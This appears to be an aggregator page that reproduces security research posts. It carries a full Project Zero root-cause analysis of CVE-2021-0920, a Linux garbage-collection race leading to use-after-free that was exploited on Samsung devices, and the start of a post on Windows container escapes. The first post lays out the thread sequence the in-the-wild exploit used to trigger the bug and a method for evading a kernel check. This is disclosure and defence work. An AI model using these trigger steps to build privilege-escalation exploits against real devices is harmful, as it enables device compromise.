Summary

Total Articles Found: 9

Top sources:

Top Keywords:

Top Authors

Top Articles:

  • FF Sandbox Escape (CVE-2020-12388)
  • One Byte to rule them all
  • In-the-Wild Series: Windows Exploits
  • The quantum state of Linux kernel garbage collection CVE-2021-0920 (Part I)
  • In-the-Wild Series: Android Exploits
  • In-the-Wild Series: Android Post-Exploitation
  • Who Contains the Containers?
  • In-the-Wild Series: Chrome Exploits
  • In-the-Wild Series: Chrome Infinity Bug

The quantum state of Linux kernel garbage collection CVE-2021-0920 (Part I)

Published: 2022-08-10 23:00:00

Popularity: 26

Author: Google Project Zero

A deep dive into an in-the-wild Android exploit

Guest Post by Xingyu Jin, Android Security Research

This is part one of a two-part guest blog post, where first we'll look at the root cause of the CVE-2021-0920 vulnerability. In the second post, we'll dive into the in-the-wild 0-day exploitation of the vulnerability and post-compromise modules.

Overview of in-the-wild CVE-2021-0920 exploits

A surveillance vendor named Wintego has developed an exploit for Linux socket syscall 0-day, CVE-2021-0920, and used it in the wild since at least November 2020 based on the earliest captured sample, until the issue was fixed in November 2021.  Combined with Chrome and Samsung browser exploits, the vendor was able to remotely root Samsung devices. The fix was released with the November 2021 Android Security Bulletin, and applied to Samsung devices in Samsung's December 2021 security update.

Google's Threat Analysis Group (TAG) discovered Samsung browser exploit chains being used in the wild. TAG then performed root cause analysis and discovered that this vulnerability, CVE-2021-0920, was being used to escape the sandbox and elevate privileges. CVE-2021-0920 was reported to Linux/Android anonymously. The Google Android Security Team performed the full deep-dive analysis of the exploit.

This issue was initially discovered in 2016 by a RedHat kernel developer and disclosed in a public email thread, but the Linux kernel community did not patch the issue until it was re-reported in 2021.

Various Samsung devices were targeted, including the Samsung S10 and S20. By abusing an ephemeral race condition in Linux kernel garbage collection, the exploit code was able to obtain a use-after-free (UAF) in a kernel sk_buff object. The in-the-wild sample could effectively circumvent CONFIG_ARM64_UAO, achieve arbitrary read / write primitives and bypass Samsung RKP to elevate to root. Other Android devices were also vulnerable, but we did not find any exploit samples against them.

Text extracted from captured samples dubbed the vulnerability “quantum Linux kernel garbage collection”, which appears to be a fitting title for this blogpost.

Introduction

CVE-2021-0920 is a use-after-free (UAF) due to a race condition in the garbage collection system for SCM_RIGHTS. SCM_RIGHTS is a control message that allows unix-domain sockets to transmit an open file descriptor from one process to another. In other words, the sender transmits a file descriptor and the receiver then obtains a file descriptor from the sender. This passing of file descriptors adds complexity to reference-counting file structs. To account for this, the Linux kernel community designed a special garbage collection system. CVE-2021-0920 is a vulnerability within this garbage collection system. By winning a race condition during the garbage collection process, an adversary can exploit the UAF on the socket buffer, sk_buff object. In the following sections, we’ll explain the SCM_RIGHTS garbage collection system and the details of the vulnerability. The analysis is based on the Linux 4.14 kernel.

What is SCM_RIGHTS?

Linux developers can share file descriptors (fd) from one process to another using the SCM_RIGHTS datagram with the sendmsg syscall. When a process passes a file descriptor to another process, SCM_RIGHTS will add a reference to the underlying file struct. This means that the process that is sending the file descriptors can immediately close the file descriptor on their end, even if the receiving process has not yet accepted and taken ownership of the file descriptors. When the file descriptors are in the “queued” state (meaning the sender has passed the fd and then closed it, but the receiver has not yet accepted the fd and taken ownership), specialized garbage collection is needed. To track this “queued” state, this LWN article does a great job explaining SCM_RIGHTS reference counting, and it's recommended reading before continuing on with this blogpost.

Sending

As stated previously, a unix domain socket uses the syscall sendmsg to send a file descriptor to another socket. To explain the reference counting that occurs during SCM_RIGHTS, we’ll start from the sender’s point of view. We start with the kernel function unix_stream_sendmsg, which implements the sendmsg syscall. To implement the SCM_RIGHTS functionality, the kernel uses the structure scm_fp_list for managing all the transmitted file structures. scm_fp_list stores the list of file pointers to be passed.

struct scm_fp_list {

        short                   count;

        short                   max;

        struct user_struct      *user;

        struct file             *fp[SCM_MAX_FD];

};

unix_stream_sendmsg invokes scm_send (af_unix.c#L1886) to initialize the scm_fp_list structure, linked by the scm_cookie structure on the stack.

struct scm_cookie {

        struct pid              *pid;           /* Skb credentials */

        struct scm_fp_list      *fp;            /* Passed files         */

        struct scm_creds        creds;          /* Skb credentials      */

#ifdef CONFIG_SECURITY_NETWORK

        u32                     secid;          /* Passed security ID   */

#endif

};

To be more specific, scm_send → __scm_send → scm_fp_copy (scm.c#L68) reads the file descriptors from the userspace and initializes scm_cookie->fp which can contain SCM_MAX_FD file structures.

Since the Linux kernel uses the sk_buff (also known as socket buffers or skb) object to manage all types of socket datagrams, the kernel also needs to invoke the unix_scm_to_skb function to link the scm_cookie->fp to a corresponding skb object. This occurs in unix_attach_fds (scm.c#L103):

/*

 * Need to duplicate file references for the sake of garbage

 * collection.  Otherwise a socket in the fps might become a

 * candidate for GC while the skb is not yet queued.

 */

UNIXCB(skb).fp = scm_fp_dup(scm->fp);

if (!UNIXCB(skb).fp)

        return -ENOMEM;

The scm_fp_dup call in unix_attach_fds increases the reference count of the file descriptor that’s being passed so the file is still valid even after the sender closes the transmitted file descriptor later:

struct scm_fp_list *scm_fp_dup(struct scm_fp_list *fpl)

{

        struct scm_fp_list *new_fpl;

        int i;

        if (!fpl)

                return NULL;

        new_fpl = kmemdup(fpl, offsetof(struct scm_fp_list, fp[fpl->count]),

                          GFP_KERNEL);

        if (new_fpl) {

                for (i = 0; i < fpl->count; i++)

                        get_file(fpl->fp[i]);

                new_fpl->max = new_fpl->count;

                new_fpl->user = get_uid(fpl->user);

        }

        return new_fpl;

}

Let’s examine a concrete example. Assume we have sockets A and B. The A attempts to pass itself to B. After the SCM_RIGHTS datagram is sent, the newly allocated skb from the sender will be appended to the B’s sk_receive_queue which stores received datagrams:

sk_buff carries scm_fp_list structure

The reference count of A is incremented to 2 and the reference count of B is still 1.

Receiving

Now, let’s take a look at the receiver side unix_stream_read_generic (we will not discuss the MSG_PEEK flag yet, and focus on the normal routine). First of all, the kernel grabs the current skb from sk_receive_queue using skb_peek. Secondly, since scm_fp_list is attached to the skb, the kernel will call unix_detach_fds (link) to parse the transmitted file structures from skb and clear the skb from sk_receive_queue:

/* Mark read part of skb as used */

if (!(flags & MSG_PEEK)) {

        UNIXCB(skb).consumed += chunk;

        sk_peek_offset_bwd(sk, chunk);

        if (UNIXCB(skb).fp)

                unix_detach_fds(&scm, skb);

        if (unix_skb_len(skb))

                break;

        skb_unlink(skb, &sk->sk_receive_queue);

        consume_skb(skb);

        if (scm.fp)

                break;

The function scm_detach_fds iterates over the list of passed file descriptors (scm->fp) and installs the new file descriptors accordingly for the receiver:

for (i=0, cmfptr=(__force int __user *)CMSG_DATA(cm); i<fdmax;

     i++, cmfptr++)

{

        struct socket *sock;

        int new_fd;

        err = security_file_receive(fp[i]);

        if (err)

                break;

        err = get_unused_fd_flags(MSG_CMSG_CLOEXEC & msg->msg_flags

                                  ? O_CLOEXEC : 0);

        if (err < 0)

                break;

        new_fd = err;

        err = put_user(new_fd, cmfptr);

        if (err) {

                put_unused_fd(new_fd);

                break;

        }

        /* Bump the usage count and install the file. */

        sock = sock_from_file(fp[i], &err);

        if (sock) {

                sock_update_netprioidx(&sock->sk->sk_cgrp_data);

                sock_update_classid(&sock->sk->sk_cgrp_data);

        }

        fd_install(new_fd, get_file(fp[i]));

}

/*

 * All of the files that fit in the message have had their

 * usage counts incremented, so we just free the list.

 */

__scm_destroy(scm);

Once the file descriptors have been installed, __scm_destroy (link) cleans up the allocated scm->fp and decrements the file reference count for every transmitted file structure:

void __scm_destroy(struct scm_cookie *scm)

{

        struct scm_fp_list *fpl = scm->fp;

        int i;

        if (fpl) {

                scm->fp = NULL;

                for (i=fpl->count-1; i>=0; i--)

                        fput(fpl->fp[i]);

                free_uid(fpl->user);

                kfree(fpl);

        }

}

Reference Counting and Inflight Counting

As mentioned above, when a file descriptor is passed using SCM_RIGHTS, its reference count is immediately incremented. Once the recipient socket has accepted and installed the passed file descriptor, the reference count is then decremented. The complication comes from the “middle” of this operation: after the file descriptor has been sent, but before the receiver has accepted and installed the file descriptor.

Let’s consider the following scenario:

  1. The process creates sockets A and B.
  2. A sends socket A to socket B.
  3. B sends socket B to socket A.
  4. Close A.
  5. Close B.

Scenario for reference count cycle

Both sockets are closed prior to accepting the passed file descriptors.The reference counts of A and B are both 1 and can't be further decremented because they were removed from the kernel fd table when the respective processes closed them. Therefore the kernel is unable to release the two skbs and sock structures and an unbreakable cycle is formed. The Linux kernel garbage collection system is designed to prevent memory exhaustion in this particular scenario. The inflight count was implemented to identify potential garbage. Each time the reference count is increased due to an SCM_RIGHTS datagram being sent, the inflight count will also be incremented.

When a file descriptor is sent by SCM_RIGHTS datagram, the Linux kernel puts its unix_sock into a global list gc_inflight_list. The kernel increments unix_tot_inflight which counts the total number of inflight sockets. Then, the kernel increments u->inflight which tracks the inflight count for each individual file descriptor in the unix_inflight function (scm.c#L45) invoked from unix_attach_fds:

void unix_inflight(struct user_struct *user, struct file *fp)

{

        struct sock *s = unix_get_socket(fp);

        spin_lock(&unix_gc_lock);

        if (s) {

                struct unix_sock *u = unix_sk(s);

                if (atomic_long_inc_return(&u->inflight) == 1) {

                        BUG_ON(!list_empty(&u->link));

                        list_add_tail(&u->link, &gc_inflight_list);

                } else {

                        BUG_ON(list_empty(&u->link));

                }

                unix_tot_inflight++;

        }

        user->unix_inflight++;

        spin_unlock(&unix_gc_lock);

}

Thus, here is what the sk_buff looks like when transferring a file descriptor within sockets A and B:

The inflight count of A is incremented

When the socket file descriptor is received from the other side, the unix_sock.inflight count will be decremented.

Let’s revisit the reference count cycle scenario before the close syscall. This cycle is breakable because any socket files can receive the transmitted file and break the reference cycle: 

Breakable cycle before close A and B

After closing both of the file descriptors, the reference count equals the inflight count for each of the socket file descriptors, which is a sign of possible garbage:

Unbreakable cycle after close A and B

Now, let’s check another example. Assume we have sockets A, B and 𝛼:

  1. A sends socket A to socket B.
  2. B sends socket B to socket A.
  3. B sends socket B to socket 𝛼.
  4. 𝛼 sends socket 𝛼 to socket B.
  5. Close A.
  6. Close B.

Breakable cycle for A, B and 𝛼

The cycle is breakable, because we can get newly installed file descriptor B from the socket file descriptor 𝛼 and newly installed file descriptor A' from B’.

Garbage Collection

A high level view of garbage collection is available from lwn.net:

"If, instead, the two counts are equal, that file structure might be part of an unreachable cycle. To determine whether that is the case, the kernel finds the set of all in-flight Unix-domain sockets for which all references are contained in SCM_RIGHTS datagrams (for which f_count and inflight are equal, in other words). It then counts how many references to each of those sockets come from SCM_RIGHTS datagrams attached to sockets in this set. Any socket that has references coming from outside the set is reachable and can be removed from the set. If it is reachable, and if there are any SCM_RIGHTS datagrams waiting to be consumed attached to it, the files contained within that datagram are also reachable and can be removed from the set.

At the end of an iterative process, the kernel may find itself with a set of in-flight Unix-domain sockets that are only referenced by unconsumed (and unconsumable) SCM_RIGHTS datagrams; at this point, it has a cycle of file structures holding the only references to each other. Removing those datagrams from the queue, releasing the references they hold, and discarding them will break the cycle."

To be more specific, the SCM_RIGHTS garbage collection system was developed in order to handle the unbreakable reference cycles. To identify which file descriptors are a part of unbreakable cycles:

  1. Add any unix_sock objects whose reference count equals its inflight count to the gc_candidates list.
  2. Determine if the socket is referenced by any sockets outside of the gc_candidates list. If it is then it is reachable, remove it and any sockets it references from the gc_candidates list. Repeat until no more reachable sockets are found.
  3. After this iterative process, only sockets who are solely referenced by other sockets within the gc_candidates list are left.

Let’s take a closer look at how this garbage collection process works. First, the kernel finds all the unix_sock objects whose reference counts equals their inflight count and puts them into the gc_candidates list (garbage.c#L242):

list_for_each_entry_safe(u, next, &gc_inflight_list, link) {

        long total_refs;

        long inflight_refs;

        total_refs = file_count(u->sk.sk_socket->file);

        inflight_refs = atomic_long_read(&u->inflight);

        BUG_ON(inflight_refs < 1);

        BUG_ON(total_refs < inflight_refs);

        if (total_refs == inflight_refs) {

                list_move_tail(&u->link, &gc_candidates);

                __set_bit(UNIX_GC_CANDIDATE, &u->gc_flags);

                __set_bit(UNIX_GC_MAYBE_CYCLE, &u->gc_flags);

        }

}

Next, the kernel removes any sockets that are referenced by other sockets outside of the current gc_candidates list. To do this, the kernel invokes scan_children (garbage.c#138) along with the function pointer dec_inflight to iterate through each candidate’s sk->receive_queue. It decreases the inflight count for each of the passed file descriptors that are themselves candidates for garbage collection (garbage.c#L261):

/* Now remove all internal in-flight reference to children of

 * the candidates.

 */

list_for_each_entry(u, &gc_candidates, link)

        scan_children(&u->sk, dec_inflight, NULL);

After iterating through all the candidates, if a gc candidate still has a positive inflight count it means that it is referenced by objects outside of the gc_candidates list and therefore is reachable. These candidates should not be included in the gc_candidates list so the related inflight counts need to be restored.

To do this, the kernel will put the candidate to not_cycle_list instead and iterates through its receiver queue of each transmitted file in the gc_candidates list (garbage.c#L281) and increments the inflight count back. The entire process is done recursively, in order for the garbage collection to avoid purging reachable sockets:

/* Restore the references for children of all candidates,

 * which have remaining references.  Do this recursively, so

 * only those remain, which form cyclic references.

 *

 * Use a "cursor" link, to make the list traversal safe, even

 * though elements might be moved about.

 */

list_add(&cursor, &gc_candidates);

while (cursor.next != &gc_candidates) {

        u = list_entry(cursor.next, struct unix_sock, link);

        /* Move cursor to after the current position. */

        list_move(&cursor, &u->link);

        if (atomic_long_read(&u->inflight) > 0) {

                list_move_tail(&u->link, &not_cycle_list);

                __clear_bit(UNIX_GC_MAYBE_CYCLE, &u->gc_flags);

                scan_children(&u->sk, inc_inflight_move_tail, NULL);

        }

}

list_del(&cursor);

Now gc_candidates contains only “garbage”. The kernel restores original inflight counts from gc_candidates, moves candidates from not_cycle_list back to gc_inflight_list and invokes __skb_queue_purge for cleaning up garbage (garbage.c#L306).

/* Now gc_candidates contains only garbage.  Restore original

 * inflight counters for these as well, and remove the skbuffs

 * which are creating the cycle(s).

 */

skb_queue_head_init(&hitlist);

list_for_each_entry(u, &gc_candidates, link)

        scan_children(&u->sk, inc_inflight, &hitlist);

/* not_cycle_list contains those sockets which do not make up a

 * cycle.  Restore these to the inflight list.

 */

while (!list_empty(&not_cycle_list)) {

        u = list_entry(not_cycle_list.next, struct unix_sock, link);

        __clear_bit(UNIX_GC_CANDIDATE, &u->gc_flags);

        list_move_tail(&u->link, &gc_inflight_list);

}

spin_unlock(&unix_gc_lock);

/* Here we are. Hitlist is filled. Die. */

__skb_queue_purge(&hitlist);

spin_lock(&unix_gc_lock);

__skb_queue_purge clears every skb from the receiver queue:

/**

 *      __skb_queue_purge - empty a list

 *      @list: list to empty

 *

 *      Delete all buffers on an &sk_buff list. Each buffer is removed from

 *      the list and one reference dropped. This function does not take the

 *      list lock and the caller must hold the relevant locks to use it.

 */

void skb_queue_purge(struct sk_buff_head *list);

static inline void __skb_queue_purge(struct sk_buff_head *list)

{

        struct sk_buff *skb;

        while ((skb = __skb_dequeue(list)) != NULL)

                kfree_skb(skb);

}

There are two ways to trigger the garbage collection process:

  1. wait_for_unix_gc is invoked at the beginning of the sendmsg function if there are more than 16,000 inflight sockets
  2. When a socket file is released by the kernel (i.e., a file descriptor is closed), the kernel will directly invoke unix_gc.

Note that unix_gc is not preemptive. If garbage collection is already in process, the kernel will not perform another unix_gc invocation.

Now, let’s check this example (a breakable cycle) with a pair of sockets f00 and f01, and a single socket 𝛼:

  1. Socket f 00 sends socket f 00 to socket f 01.
  2. Socket f 01 sends socket f 01 to socket 𝛼.
  3. Close f 00.
  4. Close f 01.

Before starting the garbage collection process, the status of socket file descriptors are:

  • f 00: ref = 1, inflight = 1
  • f 01: ref = 1, inflight = 1
  • 𝛼: ref = 1, inflight = 0

Breakable cycle by f 00, f 01 and 𝛼

During the garbage collection process, f 00 and f 01 are considered garbage candidates. The inflight count of f 00 is dropped to zero, but the count of f 01 is still 1 because 𝛼 is not a candidate. Thus, the kernel will restore the inflight count from f 01’s receive queue. As a result, f 00 and f 01 are not treated as garbage anymore.

CVE-2021-0920 Root Cause Analysis

When a user receives SCM_RIGHTS message from recvmsg without the MSG_PEEK flag, the kernel will wait until the garbage collection process finishes if it is in progress. However, if the MSG_PEEK flag is on, the kernel will increment the reference count of the transmitted file structures without synchronizing with any ongoing garbage collection process. This may lead to inconsistency of the internal garbage collection state, making the garbage collector mark a non-garbage sock object as garbage to purge.

recvmsg without MSG_PEEK flag

The kernel function unix_stream_read_generic (af_unix.c#L2290) parses the SCM_RIGHTS message and manages the file inflight count when the MSG_PEEK flag is NOT set. Then, the function unix_stream_read_generic calls unix_detach_fds to decrement the inflight count. Then, unix_detach_fds clears the list of passed file descriptors (scm_fp_list) from the skb:

static void unix_detach_fds(struct scm_cookie *scm, struct sk_buff *skb)

{

        int i;

        scm->fp = UNIXCB(skb).fp;

        UNIXCB(skb).fp = NULL;

        for (i = scm->fp->count-1; i >= 0; i--)

                unix_notinflight(scm->fp->user, scm->fp->fp[i]);

}

The unix_notinflight from unix_detach_fds will reverse the effect of unix_inflight by decrementing the inflight count:

void unix_notinflight(struct user_struct *user, struct file *fp)

{

        struct sock *s = unix_get_socket(fp);

        spin_lock(&unix_gc_lock);

        if (s) {

                struct unix_sock *u = unix_sk(s);

                BUG_ON(!atomic_long_read(&u->inflight));

                BUG_ON(list_empty(&u->link));

                if (atomic_long_dec_and_test(&u->inflight))

                        list_del_init(&u->link);

                unix_tot_inflight--;

        }

        user->unix_inflight--;

        spin_unlock(&unix_gc_lock);

}

Later skb_unlink and consume_skb are invoked from unix_stream_read_generic (af_unix.c#2451) to destroy the current skb. Following the call chain kfree(skb)->__kfree_skb, the kernel will invoke the function pointer skb->destructor (code) which redirects to unix_destruct_scm:

static void unix_destruct_scm(struct sk_buff *skb)

{

        struct scm_cookie scm;

        memset(&scm, 0, sizeof(scm));

        scm.pid  = UNIXCB(skb).pid;

        if (UNIXCB(skb).fp)

                unix_detach_fds(&scm, skb);

        /* Alas, it calls VFS */

        /* So fscking what? fput() had been SMP-safe since the last Summer */

        scm_destroy(&scm);

        sock_wfree(skb);

}

In fact, the unix_detach_fds will not be invoked again here from unix_destruct_scm because UNIXCB(skb).fp is already cleared by unix_detach_fds. Finally, fd_install(new_fd, get_file(fp[i])) from scm_detach_fds is invoked for installing a new file descriptor.

recvmsg with MSG_PEEK flag

The recvmsg process is different if the MSG_PEEK flag is set. The MSG_PEEK flag is used during receive to “peek” at the message, but the data is treated as unread. unix_stream_read_generic will invoke scm_fp_dup instead of unix_detach_fds. This increases the reference count of the inflight file (af_unix.c#2149):

/* It is questionable, see note in unix_dgram_recvmsg.

 */

if (UNIXCB(skb).fp)

        scm.fp = scm_fp_dup(UNIXCB(skb).fp);

sk_peek_offset_fwd(sk, chunk);

if (UNIXCB(skb).fp)

        break;

Because the data should be treated as unread, the skb is not unlinked and consumed when the MSG_PEEK flag is set. However, the receiver will still get a new file descriptor for the inflight socket.

recvmsg Examples

Let’s see a concrete example. Assume there are the following socket pairs:

  • f 00, f 01
  • f 10, f 11

Now, the program does the following operations:

  • f 00 → [f 00] → f 01 (means f 00 sends [f 00] to f 01)
  • f 10 → [f 00] → f 11
  • Close(f 00)

Breakable cycle by f 00, f 01, f 10 and f 11

Here is the status:

  • inflight(f 00) = 2, ref(f 00) = 2
  • inflight(f 01) = 0, ref(f 01) = 1
  • inflight(f 10) = 0, ref(f 10) = 1
  • inflight(f 11) = 0, ref(f 11) = 1

If the garbage collection process happens now, before any recvmsg calls, the kernel will choose f 00 as the garbage candidate. However, f 00 will not have the inflight count altered and the kernel will not purge any garbage.

If f 01 then calls recvmsg with MSG_PEEK flag, the receive queue doesn’t change and the inflight counts are not decremented. f 01 gets a new file descriptor f 00' which increments the reference count on f 00:

MSG_PEEK increment the reference count of f 00 while the receive queue is not cleared

Status:

  • inflight(f 00) = 2, ref(f 00) = 3
  • inflight(f 01) = 0, ref(f 01) = 1
  • inflight(f 10) = 0, ref(f 10) = 1
  • inflight(f 11) = 0, ref(f 11) = 1

Then, f 01 calls recvmsg without MSG_PEEK flag, f 01’s receive queue is removed. f 01 also fetches a new file descriptor f 00'':

The receive queue of f 01 is cleared and f 01'' is obtained from f 01

Status:

  • inflight(f 00) = 1, ref(f 00) = 3
  • inflight(f 01) = 0, ref(f 01) = 1
  • inflight(f 10) = 0, ref(f 10) = 1
  • inflight(f 11) = 0, ref(f 11) = 1

UAF Scenario

From a very high level perspective, the internal state of Linux garbage collection can be non-deterministic because MSG_PEEK is not synchronized with the garbage collector. There is a race condition where the garbage collector can treat an inflight socket as a garbage candidate while the file reference is incremented at the same time during the MSG_PEEK receive. As a consequence, the garbage collector may purge the candidate, freeing the socket buffer, while a receiver may install the file descriptor, leading to a UAF on the skb object.

Let’s see how the captured 0-day sample triggers the bug step by step (simplified version, in reality you may need more threads working together, but it should demonstrate the core idea). First of all, the sample allocates the following socket pairs and single socket 𝛼:

  • f 00, f 01
  • f 10, f 11
  • f 20, f 21
  • f 30, f 31
  • sock 𝛼 (actually there might be even thousands of 𝛼 for protracting the garbage collection process in order to evade a BUG_ON check which will be introduced later).

Now, the program does the below operations:

Close the following file descriptors prior to any recvmsg calls:

  • Close(f 00)
  • Close(f 01)
  • Close(f 11)
  • Close(f 10)
  • Close(f 30)
  • Close(f 31)
  • Close(𝛼)

Here is the status:

  • inflight(f 00) = N + 1, ref(f 00) = N + 1
  • inflight(f 01) = 2, ref(f 01) = 2
  • inflight(f 10) = 3, ref(f 10) = 3
  • inflight(f 11) = 1, ref(f 11) = 1
  • inflight(f 20) = 0, ref(f 20) = 1
  • inflight(f 21) = 0, ref(f 21) = 1
  • inflight(f 31) = 1, ref(f 31) = 1
  • inflight(𝛼) = 1, ref(𝛼) = 1

If the garbage collection process happens now, the kernel will do the following scrutiny:

  • List f 00, f 01, f 10,  f 11, f 31, 𝛼 as garbage candidates. Decrease inflight count for the candidate children in each receive queue.
  • Since f 21 is not considered a candidate, f 11’s inflight count is still above zero.
  • Recursively restore the inflight count.
  • Nothing is considered garbage.

A potential skb UAF by race condition can be triggered by:

  1. Call recvmsg with MSG_PEEK flag from f 21 to get f 11’.
  2. Call recvmsg with MSG_PEEK flag from f 11 to get f 10’.
  3. Concurrently do the following operations:
  1. Call recvmsg without MSG_PEEK flag from f 11 to get f 10’’.
  2. Call recvmsg with MSG_PEEK flag from f 10

How is it possible? Let’s see a case where the race condition is not hit so there is no UAF:

Thread 0

Thread 1

Thread 2

Call unix_gc

Stage0: List f 00, f 01, f 10,  f 11, f 31, 𝛼 as garbage candidates.

Call recvmsg with MSG_PEEK flag from f 21 to get f 11

Increase reference count: scm.fp = scm_fp_dup(UNIXCB(skb).fp);

Stage0: decrease inflight count from the child of every garbage candidate

Status after stage 0:

inflight(f 00) = 0

inflight(f 01) = 0

inflight(f 10) = 0

inflight(f 11) = 1

inflight(f 31) = 0

inflight(𝛼) = 0

Stage1: Recursively restore inflight count if a candidate still has inflight count.

Stage1: All inflight counts have been restored.

Stage2: No garbage, return.

Call recvmsg with MSG_PEEK flag from f 11 to get f 10

Call recvmsg without MSG_PEEK flag from f 11 to get f 10’’

Call recvmsg with MSG_PEEK flag from f 10

Everyone is happy

Everyone is happy

Everyone is happy

However, if the second recvmsg occurs just after stage 1 of the garbage collection process, the UAF is triggered:

Thread 0

Thread 1

Thread 2

Call unix_gc

Stage0: List f 00, f 01, f 10,  f 11, f 31, 𝛼 as garbage candidates.

Call recvmsg with MSG_PEEK flag from f 21 to get f 11

Increase reference count: scm.fp = scm_fp_dup(UNIXCB(skb).fp);

Stage0: decrease inflight count from the child of every garbage candidates

Status after stage 0:

inflight(f 00) = 0

inflight(f 01) = 0

inflight(f 10) = 0

inflight(f 11) = 1

inflight(f 31) = 0

inflight(𝛼) = 0

Stage1: Start restoring inflight count.

Call recvmsg with MSG_PEEK flag from f 11 to get f 10

Call recvmsg without MSG_PEEK flag from f 11 to get f 10’’

unix_detach_fds: UNIXCB(skb).fp = NULL

Blocked by spin_lock(&unix_gc_lock)

Stage1: scan_inflight cannot find candidate children from f 11. Thus, the inflight count accidentally remains the same.

Stage2: f 00, f 01, f 10, f 31, 𝛼 are garbage.

Stage2: start purging garbage.

Start calling recvmsg with MSG_PEEK flag from f 10’, which would expect to receive f 00'

Get skb = skb_peek(&sk->sk_receive_queue), skb is going to be freed by thread 0.

Stage2: for, calls __skb_unlink and kfree_skb later.

state->recv_actor(skb, skip, chunk, state) UAF

GC finished.

Start garbage collection.

Get f 10’’

Therefore, the race condition causes a UAF of the skb object. At first glance, we should blame the second recvmsg syscall because it clears skb.fp, the passed file list. However, if the first recvmsg syscall doesn’t set the MSG_PEEK flag, the UAF can be avoided because unix_notinflight is serialized with the garbage collection. In other words, the kernel makes sure the garbage collection is either not processed or finished before decrementing the inflight count and removing the skb. After unix_notinflight, the receiver obtains f11' and inflight sockets don't form an unbreakable cycle.

Since MSG_PEEK is not serialized with the garbage collection, when recvmsg is called with MSG_PEEK set, the kernel still considers f 11 as a garbage candidate. For this reason, the following next recvmsg will eventually trigger the bug due to the inconsistent state of the garbage collection process.

 

Patch Analysis

CVE-2021-0920 was found in 2016

The vulnerability was initially reported to the Linux kernel community in 2016. The researcher also provided the correct patch advice but it was not accepted by the Linux kernel community:

Patch was not applied in 2016

In theory, anyone who saw this patch might come up with an exploit against the faulty garbage collector.

Patch in 2021

Let’s check the official patch for CVE-2021-0920. For the MSG_PEEK branch, it requests the garbage collection lock unix_gc_lock before performing sensitive actions and immediately releases it afterwards:

+       spin_lock(&unix_gc_lock);

+       spin_unlock(&unix_gc_lock);

The patch is confusing - it’s rare to see such lock usage in software development. Regardless, the MSG_PEEK flag now waits for the completion of the garbage collector, so the UAF issue is resolved.

BUG_ON Added in 2017

Andrey Ulanov from Google in 2017 found another issue in unix_gc and provided a fix commit. Additionally, the patch added a BUG_ON for the inflight count:

void unix_notinflight(struct user_struct *user, struct file *fp)

        if (s) {

                struct unix_sock *u = unix_sk(s);

 

+               BUG_ON(!atomic_long_read(&u->inflight));

                BUG_ON(list_empty(&u->link));

 

                if (atomic_long_dec_and_test(&u->inflight))

At first glance, it seems that the BUG_ON can prevent CVE-2021-0920 from being exploitable. However, if the exploit code can delay garbage collection by crafting a large amount of fake garbage,  it can waive the BUG_ON check by heap spray.

New Garbage Collection Discovered in 2021

CVE-2021-4083 deserves an honorable mention: when I discussed CVE-2021-0920 with Jann Horn and Ben Hawkes, Jann found another issue in the garbage collection, described in the Project Zero blog post Racing against the clock -- hitting a tiny kernel race window.

\

Part I Conclusion

To recap, we have discussed the kernel internals of SCM_RIGHTS and the designs and implementations of the Linux kernel garbage collector. Besides, we have analyzed the behavior of MSG_PEEK flag with the recvmsg syscall and how it leads to a kernel UAF by a subtle and arcane race condition.

The bug was spotted in 2016 publicly, but unfortunately the Linux kernel community did not accept the patch at that time. Any threat actors who saw the public email thread may have a chance to develop an LPE exploit against the Linux kernel.

In part two, we'll look at how the vulnerability was exploited and the functionalities of the post compromise modules.

...more

Who Contains the Containers?

Published: 2021-04-01 16:06:00

Popularity: 9

Author: Ryan

Posted by James Forshaw, Project Zero

This is a short blog post about a research project I conducted on Windows Server Containers that resulted in four privilege escalations which Microsoft fixed in March 2021. In the post, I describe what led to this research, my research process, and insights into what to look for if you’re researching this area.

Windows Containers Background

Windows 10 and its server counterparts added support for application containerization. The implementation in Windows is similar in concept to Linux containers, but of course wildly different. The well-known Docker platform supports Windows containers which leads to the availability of related projects such as Kubernetes running on Windows. You can read a bit of background on Windows containers on MSDN. I’m not going to go in any depth on how containers work in Linux as very little is applicable to Windows.

The primary goal of a container is to hide the real OS from an application. For example, in Docker you can download a standard container image which contains a completely separate copy of Windows. The image is used to build the container which uses a feature of the Windows kernel called a Server Silo allowing for redirection of resources such as the object manager, registry and networking. The server silo is a special type of Job object, which can be assigned to a process.

The application running in the container, as far as possible, will believe it’s running in its own unique OS instance. Any changes it makes to the system will only affect the container and not the real OS which is hosting it. This allows an administrator to bring up new instances of the application easily as any system or OS differences can be hidden.

For example the container could be moved between different Windows systems, or even to a Linux system with the appropriate virtualization and the application shouldn’t be able to tell the difference. Containers shouldn’t be confused with virtualization however, which provides a consistent hardware interface to the OS. A container is more about providing a consistent OS interface to applications.

Realistically, containers are mainly about using their isolation primitives for hiding the real OS and providing a consistent configuration in which an application can execute. However, there’s also some potential security benefit to running inside a container, as the application shouldn’t be able to directly interact with other processes and resources on the host.

There are two supported types of containers: Windows Server Containers and Hyper-V Isolated Containers. Windows Server Containers run under the current kernel as separate processes inside a server silo. Therefore a single kernel vulnerability would allow you to escape the container and access the host system.

Hyper-V Isolated Containers still run in a server silo, but do so in a separate lightweight VM. You can still use the same kernel vulnerability to escape the server silo, but you’re still constrained by the VM and hypervisor. To fully escape and access the host you’d need a separate VM escape as well.

The current MSRC security servicing criteria states that Windows Server Containers are not a security boundary as you still have direct access to the kernel. However, if you use Hyper-V isolation, a silo escape wouldn’t compromise the host OS directly as the security boundary is at the hypervisor level. That said, escaping the server silo is likely to be the first step in attacking Hyper-V containers meaning an escape is still useful as part of a chain.

As Windows Server Containers are not a security boundary any bugs in the feature won’t result in a security bulletin being issued. Any issues might be fixed in the next major version of Windows, but they might not be.

Origins of the Research

Over a year ago I was asked for some advice by Daniel Prizmant, a researcher at Palo Alto Networks on some details around Windows object manager symbolic links. Daniel was doing research into Windows containers, and wanted help on a feature which allows symbolic links to be marked as global which allows them to reference objects outside the server silo. I recommend reading Daniel’s blog post for more in-depth information about Windows containers.

Knowing a little bit about symbolic links I was able to help fill in some details and usage. About seven months later Daniel released a second blog post, this time describing how to use global symbolic links to escape a server silo Windows container. The result of the exploit is the user in the container can access resources outside of the container, such as files.

The global symbolic link feature needs SeTcbPrivilege to be enabled, which can only be accessed from SYSTEM. The exploit therefore involved injecting into a system process from the default administrator user and running the exploit from there. Based on the blog post, I thought it could be done easier without injection. You could impersonate a SYSTEM token and do the exploit all in process. I wrote a simple proof-of-concept in PowerShell and put it up on Github.

